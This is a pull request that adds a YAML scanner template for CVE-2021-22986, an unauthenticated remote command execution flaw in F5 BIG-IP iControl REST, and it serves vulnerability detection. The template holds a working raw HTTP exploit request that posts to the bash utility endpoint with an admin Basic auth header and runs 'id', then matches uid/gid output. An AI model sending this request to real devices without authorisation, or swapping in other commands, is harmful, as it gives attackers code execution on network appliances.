### PR TITLE
Adding CVE-2021-22986 (F5 BIG-IP iControl REST unauthenticated RCE)

### DIFF
--- a/cves/2021/CVE-2021-22986.yaml
+++ b/cves/2021/CVE-2021-22986.yaml
@@ -1,0 +1,31 @@
+id: CVE-2021-22986
+info:
+  name: F5 BIG-IP iControl REST unauthenticated RCE
+  author: pdteam
+  severity: critical
+  tags: bigip,cve,cve2021,rce
+  description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
+  reference: |
+      - https://twitter.com/wugeej/status/1372392693989445635
+      - https://github.com/dorkerdevil/CVE-2021-22986-Poc
+      - https://support.f5.com/csp/article/K03009991
+
+requests:
+  - raw:
+      - |
+        POST /mgmt/tm/util/bash HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic YWRtaW46
+        Accept: */*
+        Content-Type: application/json
+        Content-Length: 39
+
+        {"command":"run","utilCmdArgs":"-c id"}
+
+    matchers:
+      - type: word
+        words:
+          - "uid="
+          - "gid="
+          - "groups="
+        condition: and


### PR DESCRIPTION
- This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface.
- https://support.f5.com/csp/article/K03009991